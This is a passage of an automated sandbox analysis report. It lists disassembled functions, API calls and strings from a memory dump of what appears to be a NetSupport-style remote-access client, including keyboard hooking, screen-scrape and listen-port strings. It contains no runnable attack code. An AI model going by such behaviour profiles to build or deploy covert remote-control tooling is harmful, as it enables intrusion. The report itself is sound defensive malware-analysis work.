                                                                                      • _free.LIBCMT ref: 110A9E64
                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                      • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                      • API String ID: 3464732724-3340099623
                                                                                      • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                      • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50
                                                                                      Function 11133920 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2283 11133920-1113395c 2284 11133962-11133984 call 1105dd10 2283->2284 2285 11133c84-11133c9f call 11161d01 2283->2285 2284->2285 2290 1113398a-1113399e GetLocalTime 2284->2290 2291 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 2290->2291 2292 111339a0-111339bc call 11146450 2290->2292 2299 11133a45-11133a5b GetProcAddress 2291->2299 2300 11133a5d-11133a64 GetProcessHandleCount 2291->2300 2292->2291 2299->2300 2301 11133a66-11133a68 SetLastError 2299->2301 2302 11133a6e-11133a76 2300->2302 2301->2302 2303 11133a92-11133a9e 2302->2303 2304 11133a78-11133a90 GetProcAddress 2302->2304 2306 11133aa0-11133ab8 GetProcAddress 2303->2306 2308 11133aba-11133ac5 2303->2308 2304->2303 2305 11133ac7-11133ad2 SetLastError 2304->2305 2305->2306 2306->2308 2309 11133ad4-11133adc SetLastError 2306->2309 2310 11133adf-11133aef GetProcAddress 2308->2310 2309->2310 2312 11133af1-11133afd K32GetProcessMemoryInfo 2310->2312 2313 11133aff-11133b01 SetLastError 2310->2313 2314 11133b07-11133b15 2312->2314 2313->2314 2315 11133b23-11133b2e 2314->2315 2316 11133b17-11133b1f 2314->2316 2317 11133b30-11133b38 2315->2317 2318 11133b3c-11133b47 2315->2318 2316->2315 2317->2318 2319 11133b55-11133b5f 2318->2319 2320 11133b49-11133b51 2318->2320 2321 11133b61-11133b68 2319->2321 2322 11133b6a-11133b6d 2319->2322 2320->2319 2323 11133b6f-11133b7d call 11146450 2321->2323 2322->2323 2324 11133b80-11133b92 2322->2324 2323->2324 2328 11133c5a-11133c68 2324->2328 2329 11133b98-11133baa call 110637c0 2324->2329 2330 11133c6a-11133c6b FreeLibrary 2328->2330 2331 11133c6d-11133c75 2328->2331 2329->2328 2337 11133bb0-11133bd1 call 1105dd10 2329->2337 2330->2331 2333 11133c77-11133c78 FreeLibrary 2331->2333 2334 11133c7a-11133c7f 2331->2334 2333->2334 2334->2285 2336 11133c81-11133c82 FreeLibrary 2334->2336 2336->2285 2340 11133bd3-11133bd9 2337->2340 2341 11133bdf-11133bfb call 1105dd10 2337->2341 2340->2341 2343 11133bdb 2340->2343 2345 11133c06-11133c22 call 1105dd10 2341->2345 2346 11133bfd-11133c00 2341->2346 2343->2341 2350 11133c24-11133c27 2345->2350 2351 11133c2d-11133c49 call 1105dd10 2345->2351 2346->2345 2347 11133c02 2346->2347 2347->2345 2350->2351 2352 11133c29 2350->2352 2355 11133c50-11133c53 2351->2355 2356 11133c4b-11133c4e 2351->2356 2352->2351 2355->2328 2357 11133c55 call 11027780 2355->2357 2356->2355 2356->2357 2357->2328
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,A1BC2D8B), ref: 1113398E
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                      • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                      • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                      • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                      • API String ID: 263027137-1001504656
                                                                                      • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                      • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                      Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2359 1102dbc9 2360 1102dbd0-1102dbe1 2359->2360 2360->2360 2361 1102dbe3 2360->2361 2362 1102dd24-1102dd3d call 11142ac0 2361->2362 2365 1102dd43-1102dd45 2362->2365 2366 1102dbc0-1102dbc3 2362->2366 2369 1102de43-1102de5d call 111463d0 2365->2369 2370 1102dd4b-1102dd51 2365->2370 2367 1102dbc5-1102dbc7 2366->2367 2368 1102dbe8-1102dbf1 2366->2368 2367->2360 2368->2362 2371 1102dbf7-1102dbfe 2368->2371 2392 1102deb3-1102debf call 1102b4f0 2369->2392 2393 1102de5f-1102de78 call 1105dd10 2369->2393 2373 1102dd53-1102dd62 call 11144dc0 2370->2373 2374 1102dd68-1102dd78 2370->2374 2371->2362 2377 1102dcf3-1102dd08 call 11162de7 2371->2377 2378 1102dc05-1102dc07 2371->2378 2379 1102dd0a-1102dd1f call 11162de7 2371->2379 2380 1102dc9a-1102dccd call 111618c1 call 11142290 2371->2380 2381 1102dcdb-1102dcf1 call 11164010 2371->2381 2382 1102dc8b-1102dc95 2371->2382 2383 1102dccf-1102dcd9 2371->2383 2384 1102dc4c-1102dc52 2371->2384 2385 1102dc7c-1102dc86 2371->2385 2373->2374 2375 1102dd7a 2374->2375 2376 1102dd7f-1102dd9d call 1102cc10 2374->2376 2375->2376 2376->2369 2411 1102dda3-1102ddc8 call 110b7920 call 11146450 2376->2411 2377->2362 2378->2362 2391 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2378->2391 2379->2362 2380->2362 2381->2362 2382->2362 2383->2362 2395 1102dc54-1102dc68 call 11162de7 2384->2395 2396 1102dc6d-1102dc77 2384->2396 2385->2362 2391->2362 2416 1102dec1-1102dec8 2392->2416 2417 1102de98-1102de9f 2392->2417 2393->2392 2414 1102de7a-1102de8c 2393->2414 2395->2362 2396->2362 2445 1102ddd3-1102ddd9 2411->2445 2446 1102ddca-1102ddd1 2411->2446 2414->2392 2436 1102de8e 2414->2436 2421 1102dea5-1102dea8 2416->2421 2424 1102deca-1102ded4 2416->2424 2417->2421 2422 1102e0aa-1102e0cb GetComputerNameA 2417->2422 2428 1102deaa-1102deb1 call 110b7920 2421->2428 2429 1102ded9 2421->2429 2426 1102e103-1102e109 2422->2426 2427 1102e0cd-1102e101 call 11027c30 2422->2427 2424->2422 2433 1102e10b-1102e110 2426->2433 2434 1102e13f-1102e152 call 11164010 2426->2434 2427->2426 2462 1102e157-1102e163 2427->2462 2439 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2428->2439 2429->2439 2444 1102e116-1102e11a 2433->2444 2455 1102e347-1102e36a 2434->2455 2436->2417 2495 1102e07a-1102e082 SetLastError 2439->2495 2496 1102dfbc-1102dfd3 2439->2496 2449 1102e136-1102e138 2444->2449 2450 1102e11c-1102e11e 2444->2450 2452 1102dddb-1102dde2 call 11027d60 2445->2452 2453 1102de39 2445->2453 2446->2369 2460 1102e13b-1102e13d 2449->2460 2457 1102e132-1102e134 2450->2457 2458 1102e120-1102e126 2450->2458 2452->2453 2465 1102dde4-1102de16 2452->2465 2453->2369 2471 1102e392-1102e39a 2455->2471 2472 1102e36c-1102e372 2455->2472 2457->2460 2458->2449 2463 1102e128-1102e130 2458->2463 2460->2434 2460->2462 2467 1102e165-1102e17a call 110b7920 call 11029bd0 2462->2467 2468 1102e17c-1102e18f call 11081a70 2462->2468 2463->2444 2463->2457 2482 1102de20-1102de2f call 110f6080 2465->2482 2483 1102de18-1102de1e 2465->2483 2499 1102e1d3-1102e1ec call 11081a70 2467->2499 2488 1102e191-1102e1b4 2468->2488 2489 1102e1b6-1102e1b8 2468->2489 2476 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2471->2476 2477 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2471->2477 2472->2471 2481 1102e374-1102e38d call 1102d330 2472->2481 2477->2476 2481->2471 2492 1102de32-1102de34 call 1102d330 2482->2492 2483->2482 2483->2492 2488->2499 2491 1102e1c0-1102e1d1 2489->2491 2491->2491 2491->2499 2492->2453 2505 1102e043-1102e04f 2495->2505 2496->2505 2515 1102dfd5-1102dfde 2496->2515 2519 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2499->2519 2520 1102e32c-1102e339 call 11164010 2499->2520 2508 1102e092-1102e0a1 2505->2508 2509 1102e051-1102e05d 2505->2509 2508->2422 2513 1102e0a3-1102e0a4 FreeLibrary 2508->2513 2516 1102e06f-1102e073 2509->2516 2517 1102e05f-1102e06d GetProcAddress 2509->2517 2513->2422 2515->2505 2523 1102dfe0-1102e016 call 11146450 call 1112b270 2515->2523 2521 1102e084-1102e086 SetLastError 2516->2521 2522 1102e075-1102e078 2516->2522 2517->2516 2559 1102e283-1102e299 call 11128ec0 2519->2559 2560 1102e26f-1102e27e call 11029450 2519->2560 2537 1102e33c-1102e341 CharUpperA 2520->2537 2528 1102e08c 2521->2528 2522->2528 2523->2505 2544 1102e018-1102e03e call 11146450 call 11027920 2523->2544 2528->2508 2537->2455 2544->2505 2564 1102e2b2-1102e2ec call 110d0bd0 * 2 2559->2564 2565 1102e29b-1102e2ad call 110d0bd0 2559->2565 2560->2559 2572 1102e302-1102e32a call 11164010 call 110d07c0 2564->2572 2573 1102e2ee-1102e2fd call 11029450 2564->2573 2565->2564 2572->2537 2573->2572
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: $051829$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 1029625771-1446895765
                                                                                      • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                      • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
                                                                                      Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2579 111414a0-111414e1 call 11146450 2582 111414e7-11141543 LoadLibraryA 2579->2582 2583 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2579->2583 2585 11141545-11141550 call 11017450 2582->2585 2586 11141557-11141560 2582->2586 2595 11141595-1114159b 2583->2595 2596 111415c3 2583->2596 2585->2586 2593 11141552 call 110cc7f0 2585->2593 2586->2583 2587 11141562-11141563 FreeLibrary 2586->2587 2587->2583 2593->2586 2595->2596 2597 1114159d-111415a3 2595->2597 2598 111415cd-111415ed GetClassInfoExA 2596->2598 2597->2596 2599 111415a5-111415c1 call 1105dd10 2597->2599 2600 111415f3-1114161a call 11161d20 call 111444b0 2598->2600 2601 1114168e-111416e6 2598->2601 2599->2598 2610 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2600->2610 2611 1114161c-11141630 call 11029450 2600->2611 2612 11141722-11141728 2601->2612 2613 111416e8-111416ee 2601->2613 2610->2601 2638 11141677-1114168b call 11029450 2610->2638 2611->2610 2617 11141764-11141786 call 1105dd10 2612->2617 2618 1114172a-11141739 call 1110f420 2612->2618 2613->2612 2615 111416f0-111416f6 2613->2615 2615->2612 2621 111416f8-1114170f call 1112c830 LoadLibraryA 2615->2621 2628 11141794-11141799 2617->2628 2629 11141788-11141792 2617->2629 2632 1114175d 2618->2632 2633 1114173b-1114175b 2618->2633 2621->2612 2637 11141711-1114171d GetProcAddress 2621->2637 2635 111417a5-111417ab 2628->2635 2636 1114179b 2628->2636 2629->2635 2634 1114175f 2632->2634 2633->2634 2634->2617 2639 111417ad-111417b3 call 110f7d00 2635->2639 2640 111417b8-111417d1 call 1113cd80 2635->2640 2636->2635 2637->2612 2638->2601 2639->2640 2647 111417d7-111417dd 2640->2647 2648 11141879-1114188a 2640->2648 2649 111417df-111417f1 call 1110f420 2647->2649 2650 11141819-1114181f 2647->2650 2659 111417f3-11141809 call 1115d6d0 2649->2659 2660 1114180b 2649->2660 2652 11141845-11141851 2650->2652 2653 11141821-11141827 2650->2653 2657 11141853-11141859 2652->2657 2658 11141868-11141873 #17 LoadLibraryA 2652->2658 2655 1114182e-11141840 SetTimer 2653->2655 2656 11141829 call 11134930 2653->2656 2655->2652 2656->2655 2657->2658 2662 1114185b-11141861 2657->2662 2658->2648 2665 1114180d-11141814 2659->2665 2660->2665 2662->2658 2663 11141863 call 1112d6a0 2662->2663 2663->2658 2665->2650
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                      • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                      • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                      • _memset.LIBCMT ref: 111415F9
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                      • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                      • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                      • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                      • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                      • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                      • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                      • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                        • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A1BC2D8B,1102FCB2,00000000), ref: 1101747E
                                                                                        • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                        • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                        • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                        • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                        • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                      • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                      • API String ID: 3706574701-3145203681
                                                                                      • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                      • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55
                                                                                      Function 6C5D63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2668 6c5d63c0-6c5d6402 call 6c5f4710 EnterCriticalSection InterlockedDecrement 2671 6c5d65ed-6c5d6608 LeaveCriticalSection call 6c5f28e1 2668->2671 2672 6c5d6408-6c5d641f EnterCriticalSection 2668->2672 2674 6c5d64da-6c5d64e0 2672->2674 2675 6c5d6425-6c5d6431 2672->2675 2679 6c5d65bd-6c5d65e8 call 6c5f1c50 LeaveCriticalSection 2674->2679 2680 6c5d64e6-6c5d64f0 shutdown 2674->2680 2677 6c5d6443-6c5d6447 2675->2677 2678 6c5d6433-6c5d6441 GetProcAddress 2675->2678 2682 6c5d644e-6c5d6450 SetLastError 2677->2682 2683 6c5d6449-6c5d644c 2677->2683 2678->2677 2679->2671 2684 6c5d650a-6c5d652d timeGetTime #16 2680->2684 2685 6c5d64f2-6c5d6507 GetLastError call 6c5d30a0 2680->2685 2687 6c5d6456-6c5d6465 2682->2687 2683->2687 2689 6c5d656c-6c5d656e 2684->2689 2690 6c5d652f 2684->2690 2685->2684 2695 6c5d6477-6c5d647b 2687->2695 2696 6c5d6467-6c5d6475 GetProcAddress 2687->2696 2693 6c5d6570-6c5d657b closesocket 2689->2693 2691 6c5d6551-6c5d656a #16 2690->2691 2692 6c5d6531 2690->2692 2691->2689 2691->2690 2692->2691 2698 6c5d6533-6c5d653e GetLastError 2692->2698 2699 6c5d657d-6c5d658a WSAGetLastError 2693->2699 2700 6c5d65b6 2693->2700 2701 6c5d647d-6c5d6480 2695->2701 2702 6c5d6482-6c5d6484 SetLastError 2695->2702 2696->2695 2698->2689 2703 6c5d6540-6c5d6547 timeGetTime 2698->2703 2705 6c5d658c-6c5d658e Sleep 2699->2705 2706 6c5d6594-6c5d6598 2699->2706 2700->2679 2704 6c5d648a-6c5d6499 2701->2704 2702->2704 2703->2689 2708 6c5d6549-6c5d654b Sleep 2703->2708 2709 6c5d64ab-6c5d64af 2704->2709 2710 6c5d649b-6c5d64a9 GetProcAddress 2704->2710 2705->2706 2706->2693 2711 6c5d659a-6c5d659c 2706->2711 2708->2691 2712 6c5d64b1-6c5d64be 2709->2712 2713 6c5d64c3-6c5d64d5 SetLastError 2709->2713 2710->2709 2711->2700 2714 6c5d659e-6c5d65b3 GetLastError call 6c5d30a0 2711->2714 2712->2679 2713->2679 2714->2700
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D63E8
                                                                                      • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C5D63FA
                                                                                      • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6412
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D643B
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6450
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D646F
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6484
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D64A3
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64C5
                                                                                      • shutdown.WSOCK32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64E9
                                                                                      • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64F2
                                                                                      • timeGetTime.WINMM(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6510
                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6526
                                                                                      • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6533
